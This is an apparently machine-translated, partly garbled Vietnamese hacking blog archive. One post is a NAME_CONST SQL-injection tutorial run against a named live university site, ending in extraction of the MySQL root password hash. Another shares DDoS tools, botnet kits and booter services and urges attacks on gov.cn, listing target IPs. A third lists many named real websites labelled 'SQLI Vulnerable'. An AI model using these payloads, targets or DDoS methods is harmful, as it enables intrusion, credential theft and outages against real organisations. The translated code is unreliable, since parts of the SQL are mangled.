Tips & Ticks: tháng 6 2015

Thứ Ba, 30 tháng 6, 2015

[TUT] NAME_CONST SQL Injection [Pics]

Nó được một lúc kể từ khi tôi đã thực hiện một bài hướng dẫn SQL tiêm, vì vậy tôi nghĩ mình nên làm một bài hướng dẫn mới bằng cách sử dụng phương pháp name_const. Không có nhiều giấy tờ tài liệu phương pháp này, do đó, nó cảm thấy loại tốt là một để làm cho một hướng dẫn cho nó.

Thông tin

NAME_CONST đã được thêm vào trong MySQL 5.0.12, vì vậy nó sẽ không làm việc trên bất cứ điều gì ít hơn thế.
Mã số:
NAME_CONST (DATA, GIÁ TRỊ)
Trả về giá trị nhất định. Khi được sử dụng để sản xuất một cột tập hợp kết quả, NAME_CONST () gây ra các cột có tên. Các đối số phải là hằng số.

CHỌN NAME_CONST ('TEST', 1)

| --------------- |
| Test |
| |
| --------------- |
| 1 |
| |
| --------------- |

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Giới thiệu về biến MySQL

Một khi bạn đã có trang web dễ bị tổn thương của bạn, cho phép thử nhận được một số biến hệ thống MySQL sử dụng NAME_CONST.

Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 '

Spoiler (Click để ẩn)
[Image: V4jDb.png]

Mã số:
và + 1 = (chọn + * + từ + (chọn + NAME_CONST (VAR, 1), NAME_CONST (VAR, 1)) + là + x) -
VAR = biến MySQL của bạn.

MySQL 5.1.3 Các biến hệ thống máy chủ

Hãy thử nó ra trên trang web của tôi ..

Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(vers ion (), 1)) + là + x) -
Lỗi: Duplicate tên cột '5.0.27-community-nt'

Spoiler (Click để ẩn)
[Image: Um5vX.png]
Bây giờ tôi đã thử một vài trang web, và tôi đã nhận được các cuộc gọi không hợp lệ để NAME_CONST cố gắng để trích xuất dữ liệu. Không có gì là sai với cú pháp của tôi, chỉ là sẽ không làm việc ở đó. May mắn thay, họ làm việc ở đây vì vậy hãy nhận này sẽ một lần nữa ...

Khai thác dữ liệu

Mã số:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
Chúng tôi sẽ nhận được một bản sao cột 1 lỗi ...

Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME _CONST ((Chọn + 1 + hạn + 0,1), 1)) + là + x) -
Lỗi: Duplicate tên cột '1

Spoiler (Click để ẩn)
[Image: hRaSm.png]
Bây giờ chúng ta hãy bàn ra chó cái này ..

Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + table_name + từ + ema.tables information_sch + nơi + table_schema = cơ sở dữ liệu () + Hạn mức + 0,1), 1), NAME_CONST ((chọn + table_ tên + từ + information_schema.tables + nơi + table_schema = cơ sở dữ liệu () + Hạn mức + 0,1), 1)) + là + x) -
Hãy xem nếu nó hoạt động ở đây, nếu có, chúng tôi có thể đi và kết thúc công việc.

Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+info rmation_schema.tables + nơi + table_schema = cơ sở dữ liệu () + hạn + 0,1), 1), NAME_CONST ((se lect + table_name từ + + + information_schema.tables nơi + table_schema = cơ sở dữ liệu () + lim nó + 0,1), 1)) + là + x) -
Lỗi: Duplicate tên cột 'com_admanage

Spoiler (Click để ẩn)
[Image: jQ5Gg.png]
Bây giờ tôi sẽ để được lười biếng và sử dụng mysql.user làm ví dụ, chỉ vì lợi ích của thời gian.

Bạn có thể lấy ra các cột của bảng người dùng ..

Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + column_name + từ + information_sc hema.columns + nơi + table_name = 0xHEX_OF_TABLENAME + Hạn mức + 0,1), 1), NAME_CONST ((SELEC t + column_name + từ + information_schema + nơi + table_name = 0xHEX_OF_TABLENAM E + hạn + 0,1), 1)) + là + x) -
Vì vậy, tôi trông như thế này, và tôi nhận được tên cột trùng lặp 'Host'.

Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+inf ormation_schema.columns + nơi + table_schema = 0x6d7973716c + và + table_name = 0x7573657 2 + hạn + 0,1), 1), NAME_CONST ((chọn + column_name + từ + information_schema + w đây + table_schema = 0x6d7973716c + và + table_name = 0x75736572 + Hạn mức + 0,1), 1)) + là + x) -
Lỗi: Nhân đôi cột tên "Host '

Spoiler (Click để ẩn)
[Image: ykB6F.png]
Woot, thời gian để hoàn thành chó cái này đi.

Mã số:
+ Và + 1 = (chọn + * + từ + (chọn + NAME_CONST ((chọn + concat_ws (0x207e20, COLUMN1, COLU Mn2) + từ + TABLENAME + Hạn mức + 0,1), 1), NAME_CONST ((chọn + concat_ws ( 0x207e20, COLUMN1, COLUMN2) + từ + TABLENAME + Hạn mức + 0,1), 1)) + là + x) -
Vì vậy, tôi trông như thế này ...

Mã số:
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,U ser, Password) + từ + mysql.user + Hạn mức + 0,1), 1), NAME_CONST ((chọn + concat_ws (0x207e2 0, tài khoản, mật khẩu) + từ + mysql.user + Hạn mức + 0,1) , 1)) + là + x) -
Lỗi: Duplicate tên cột 'root ~ * B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Spoiler (Click để ẩn)
[Image: U472J.png]
Và chúng tôi đã có nó, cảm ơn bạn đã đọc.

Share Tool DDOS mạnh

Share Tool DDOS

Để góp vui cùng anh em phong trào Attack site GOV.CN và các website có liên quan đến vụ dàn khoan đang cao trao trên Facebook và trên các diễn đàn UG. Soleil chia sẻ cho anh em 1 số tool DDOS có thể làm vũ khí để tấn công site khựa

- Tool DDOS UDP ( Botnet shell )
https://drive.google.com/file/d/0BxTrDVTYt0wwbHhSb3lOb2hCRzA/edit ( Tool sạch)

Vi deo hướng dẫn sử dụng:
https://www.youtube.com/watch?v=AWRw7w8QRRU

File để upload lên website tạo mạng Bot
https://drive.google.com/file/d/0BxTrDVTYt0wwT1JmSmZYTUcxOEk/edit?usp=sharing

Đạn dược để Attack
https://drive.google.com/file/d/0BxTrDVTYt0wwbUQ1aDU1d2RST00/edit?usp=sharing
Sử dụng file trên để upload lên các website rồi lấy đường link ( up lên các website hack được hoặc có thể sử dụng các hosting free để tạo mạng bot)

- Booters Stressers
http://www.safeskyhacks.com/Forums/showthread.php?39-Top-10-DDoser-s-(Booters-Stressers)
Sử dụng CC để mua các tài khoản chuyên DDOS ở các trang nước ngoài. Có 2 trang Soleil thấy khá mạnh là http://www.ipstresser.com/index.php http://www.buyddos.com/

- DOS ProC5
https://drive.google.com/file/d/0BxTrDVTYt0wwT1JmSmZYTUcxOEk/edit?usp=sharing
Tool này sử dụng Proxy để Attack, gần tương tự như Web Hunter.

(Cái này Soleil cũng down trên mạng nên có thể có virus nhé )

- Và rất nhiều tool khác nữa Soleil đã trải nghiệm qua và có thể dùng được như: HOIC, LOIC, http fucker, http flood, web hunter để đánh các site mức độ trung bình. Các tool này có thể tìm kiếm trên google từ tên của chúng.

- Mạng Botnet.
Mạng botnet bằng các zoobie là máy tính, Với kinh nghiệm bản thân Soleil thấy dùng trên 2 mã nguồn này rất tốt và ổn định http://betabot.ru/ http://andromedabot.info/ xây dựng cái này phải đầu tư thời gian. Mạng botnet thì ko thể share ở đây được.

http://www.gov.cn/
Sử dụng 3 ip để làm proxy
Addresses: 58.68.168.229
58.68.168.250
209.177.92.5
58.68.168.249

DDOS các IP này Die thì website sẽ Die.

- Deface website
Cái này thì tùy thuộc vào kỹ năng và khả năng của mỗi người. Target vẫn là GOV.CN

Thứ Hai, 29 tháng 6, 2015

Giải thích làm thế nào để thâm nhập vào các trang web

Giải thích làm thế nào để thâm nhập vào các trang web

Giải thích trong video tiếp theo
https://youtu.be/3nsKSBgE0jY

Bây giờ với tải về phần mềm được sử dụng trong các bài bình luận

chương trình sàng lọc các trang web tải về các khoảng trống

từ đây

nạp kích hoạt từ Alhavej chương trình sao chép

từ đây

trang web giải mã Albasordat

từ đây

********* *

nhóm nhiễm các trang web để trải nghiệm chúng

Http://www.snapsinc.org/misc.php?id=hg ': SQLI dễ bị tổn thương

http: //www.culturalamnesia .com / Misc.php id = 7? ': SQLI Vulnerable

Http://www.gotoandlearn.com/play.php?id=134 ': SQLI Vulnerable

Http://www.gotoandlearn.com/play.php?id = 159 ': SQLI Vulnerable

Http://www.gamesinaflash.com/play.php?id=37 ': SQLI Vulnerable

Http://www.cyberthing.net/video-play.php?id=105 ': SQLI dễ bị tổn thương

Http://voshy.com/games/play.php?id=Mass_Attack ': SQLI Vulnerable

Http://www.thehopeforamerica.com/play.php?id=6625 ': SQLI dễ bị tổn thương

http: //www.japaneseballplayers. com / en / Player.php id = Matsuzaka? ': SQLI Vulnerable

Http://gotoandlearn.com/play.php?id=123 ': SQLI Vulnerable

Http://www.gamesinaflash.com/play.php?id= 29 ': SQLI Vulnerable

Http://www.cyberthing.net/video-play.php?id=89 ': SQLI Vulnerable

Http://www.thehopeforamerica.com/play.php?id=3392 ': SQLI Vulnerable

http : //voshy.com/games/play.php id = Click_Maze_2? ': SQLI Vulnerable

Http://www.hitchedmag.com/article.php?id=469 ': SQLI Vulnerable

Http://www.geneticsandsociety.org /article.php?id=3516 ': SQLI Vulnerable

Http://www.sarilocker.com/advice/qa.php?id=415 ': SQLI

: Vulnerable SQLI

Http://www.wischamberfoundation.org/wcce/display.cfm?id=237 ': SQLI Vulnerable

Http://www.lrsd.org/display.cfm?id=132 ': SQLI dễ bị tổn thương

http: / /www.wmc.org/display.cfm?ID=432 ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcs/display.cfm?id=312 ': SQLI Vulnerable

Http://www.wischamberfoundation.org /wcce/display.cfm?id=237 ': SQLI Vulnerable

Http://www.sbecouncil.org/news/display.cfm?ID=4694 ': SQLI Vulnerable

Http://linguistlist.org/cookbook/recipe-display .cfm ID = 294? ': SQLI Vulnerable

Http://www.nagra.ch/display.cfm/id/100722 ': SQLI Vulnerable

Http://www.brother.co.uk/display.cfm?id=112951 ': SQLI Vulnerable

Http://www.wmc.org/display.cfm?ID=2241 ': SQLI Vulnerable

Http://www.drycleancoalition.org/profiles/display.cfm?id=68 ': SQLI dễ bị tổn thương

http: //www.wischamberfoundation.org/wcs/display.cfm?id=178 ': SQLI Vulnerable

Http://www.sbecouncil.org/creditwatch/display.cfm?ID=4602 ': SQLI dễ bị tổn thương

http: // www. Snapsinc.org/misc.php?id=hg ': SQLI Vulnerable

Http://www.culturalamnesia.com/misc.php?id=7 ': SQLI Vulnerable

Http://www.gotoandlearn.com/play.php? id = 134 ': SQLI Vulnerable

Http://www.gotoandlearn.com/play.php?id=159 ': SQLI Vulnerable

Http://www.gamesinaflash.com/play.php?id=37 ': SQLI Vulnerable

http : //www.cyberthing.net/video-play.php id = 105? ': SQLI Vulnerable

Http://voshy.com/games/play.php?id=Mass_Attack ': SQLI dễ bị tổn thương

http: //www.thehopeforamerica .com / Play.php id = 6625? ': SQLI Vulnerable

Http://www.japaneseballplayers.com/en/player.php?id=matsuzaka ': SQLI Vulnerable

Http://gotoandlearn.com/play.php?id = 123 ': SQLI Vulnerable

Http://www.gamesinaflash.com/play.php?id=29 ': SQLI Vulnerable

Http://www.cyberthing.net/video-play.php?id=89 ': SQLI dễ bị tổn thương

Http://www.thehopeforamerica.com/play.php?id=3392 ': SQLI Vulnerable

Http://voshy.com/games/play.php?id=Click_Maze_2 ': SQLI dễ bị tổn thương

http: //www.hitchedmag. com / Article.php id = 469? ': SQLI Vulnerable

Http://www.geneticsandsociety.org/article.php?id=3516 ': SQLI Vulnerable

Http://www.sarilocker.com/advice/qa.php? id = 415 ': SQLI Vulnerable

Http://stackoverflow.com/questions/6433027/send-email-according-to-option-select-value ': SQLI Vulnerable

Http://marc.info/?l=php-db&m = 99928894110654 & w = 3 ': SQLI Vulnerable

Http://aimpoints.hq.af.mil/display.cfm?id=35673 ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcs/display.cfm?id=312 ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcce/display.cfm?id=237 ': SQLI Vulnerable

Http://www.lrsd.org/display.cfm?id=132 ': SQLI dễ bị tổn thương

http: //www.wmc.org/display.cfm?ID=432 ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcs/display.cfm?id=312 ': SQLI dễ bị tổn thương

http: //www.wischamberfoundation. org / Wcce / Display.cfm id = 237? ': SQLI Vulnerable

Http://www.sbecouncil.org/news/display.cfm?ID=4694 ': SQLI Vulnerable

Http://linguistlist.org/cookbook/recipe- ID Display.cfm = 294? ': SQLI Vulnerable

Http://www.nagra.ch/display.cfm/id/100722 ': SQLI Vulnerable

Http://www.brother.co.uk/display.cfm?id= 112.951 ': SQLI Vulnerable

Http://www.wmc.org/display.cfm?ID=2241 ': SQLI Vulnerable

Http://www.drycleancoalition.org/profiles/display.cfm?id=68 ': SQLI Vulnerable

http : id //www.wischamberfoundation.org/wcs/display.cfm = 178? ': SQLI Vulnerable

Http://www.sbecouncil.org/creditwatch/display.cfm?ID=4602 ': SQLI dễ bị tổn thương

http: // Aimpoints .hq.af.mil / Display.cfm id = 35.673? ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcs/display.cfm?id=312 ': SQLI Vulnerable

Http://www.wischamberfoundation.org /wcce/display.cfm?id=237 ': SQLI Vulnerable

Http://www.lrsd.org/display.cfm?id=132 ': SQLI Vulnerable

Http://www.wmc.org/display.cfm?ID = 432 ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcs/display.cfm?id=312 ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcce/display.cfm?id=237 ': SQLI Vulnerable

Http://www.sbecouncil.org/news/display.cfm?ID=4694 ': SQLI Vulnerable

Http://linguistlist.org/cookbook/recipe-display.cfm?ID=294 ': SQLI dễ bị tổn thương

http: //www.nagra.ch/display.cfm/id/100722 ': SQLI Vulnerable

Http://www.brother.co.uk/display.cfm?id=112951 ': SQLI dễ bị tổn thương

http: //www.wmc. ID org / Display.cfm = 2241? ': SQLI Vulnerable

Http://www.drycleancoalition.org/profiles/display.cfm?id=68 ': SQLI Vulnerable

Http://www.wischamberfoundation.org/wcs/display. cfm id = 178? ': SQLI Vulnerable

Http://www.sbecouncil.org/creditwatch/display.cfm?ID=4602 ': SQLI Vulnerable

Http://www.centerforgreatapes.org/residents-details.aspx?id= 6 ': SQLI Vulnerable

Http://www.loumalnatis.com/locations/Details.aspx?ID=10 ': SQLI Vulnerable

Http://www.efort.org/events/events-details.aspx?id=d20d6bbf- 59c8-48a5-Ae0b-Ec0617850540 ': SQLI Vulnerable

Http://cso.org/ListenandWatch/Details.aspx?id=10805 ': SQLI Vulnerable

Http://www.archelaos.com/popes/details.aspx?id= 304 ': SQLI Vulnerable

Http://www.newportonthelevee.com/events/details.aspx?id=360 ': SQLI Vulnerable

Http://www.loumalnatis.com/locations/details.aspx?id=7 ': SQLI dễ bị tổn thương

Http://www.kauffman.org/Details.aspx?id=8824 ': SQLI Vulnerable

Http://www.newportonthelevee.com/events/details.aspx?id=360 ': SQLI dễ bị tổn thương

http: // www .internationalposter.com / poster Details.aspx id = SWL01519? ': SQLI Vulnerable

Http://www.utahvalley.com/events/details.aspx?ID=105 ': SQLI Vulnerable

Http://mini-sentinel.org /data_activities/details.aspx?ID=116 ': SQLI Vulnerable

Http://dirtdevil.com/products/details/m084650red/dynamite-with-tools/ ': SQLI Vulnerable

Http://thejointlasvegas.com/Home/Events/ ? Sự kiện-Details.aspx id = 179 ': SQLI Vulnerable

Http://www.unitedafa.org/news/details.aspx?id=6062 ': SQLI Vulnerable

Http://pertronix.com/prod/new/details. aspx ID = 138? ': SQLI Vulnerable

Http://www.heathevans.org/news-events-details.aspx?ID=20 ': SQLI Vulnerable

Http://cso.org/ListenAndWatch/Details.aspx?id= 18.811 ': SQLI Vulnerable

Http://www.kauffman.org/Details.aspx?id=5758 ': SQLI Vulnerable

Http://www.loumalnatis.com/locations/Details.aspx?ID=10 ': SQLI Vulnerable

http : //www.royalenfield.com/company/news-details.aspx ID = 600? ': SQLI Vulnerable

Http://www.scottishlgbt.org/Events/Details.aspx?id=1195 ': SQLI dễ bị tổn thương

http: / /www.efort.org/events/events-details.aspx?id=e7a2ccc9-380b-4746-b87c-3045b6707297 ': SQLI Vulnerable

Http://www.internationalposter.com/poster-details.aspx?id=SNL17632 ' : Vulnerable SQLI

Http://www.centerforgreatapes.org/residents-details.aspx?id=39 ': SQLI Vulnerable

Http://newportonthelevee.com/events/details.aspx?id=871 ': SQLI dễ bị tổn thương

http: / /dirtdevil.com/products/details/m0105/purpose-for-pets-hand-vac/ ': SQLI Vulnerable

Http://www.dad.ie/details.aspx?id=444 ': SQLI dễ bị tổn thương

http: // Cso.org/ListenAndWatch/Details.aspx?id=18696 ': SQLI Vulnerable

Http://www.venturer.com/news-details.aspx?id=17 ': SQLI Vulnerable

Http://www.loumalnatis.com/ địa điểm / ID Details.aspx = 25? ': SQLI Vulnerable

Http://www.kauffman.org/Details.aspx?id=6730 ': SQLI Vulnerable

Http://eladl.org/news/details.aspx?id= 2397bf39-3ff2-4ed3-Baf5-573777e309f7 ': SQLI Vulnerable

Http://www.scottishlgbt.org/Events/Details.aspx?id=1189 ': SQLI Vulnerable

Http://cso.org/ListenandWatch/Details.aspx? id = 7053 ': SQLI Vulnerable

Http://www.internationalposter.com/poster-details.aspx?id=SWL01687 ': SQLI Vulnerable

Http://www.centerforgreatapes.org/residents-details.aspx?id=2 ' : SQLI Vulnerable

Http://www.kauffman.org/Details.aspx%5C?id=1020 ': SQLI Vulnerable

Http://www.efort.org/events/events-details.aspx?id=7f262d50-c478- 410b-90bd-Fa80b48684bc ': SQLI Vulnerable

Http://dirtdevil.com/products/details/m08230red/ultra-hand-vac/ ': SQLI Vulnerable

Http://www.loumalnatis.com/locations/Details.aspx?ID = 20 ': SQLI Vulnerable

Http://dirtdevil.com/products/details/bd10035red/ ': SQLI Vulnerable

Http://omura2011.fibaasia.net/Team_Details.aspx?id=66 ': SQLI dễ bị tổn thương

Http://www.optoma.ca/Product_detail.asp?product_id=426 ': SQLI Vulnerable

____________________________________________________

Giải thích tải

Đợi 5 giây đếm ngược như hình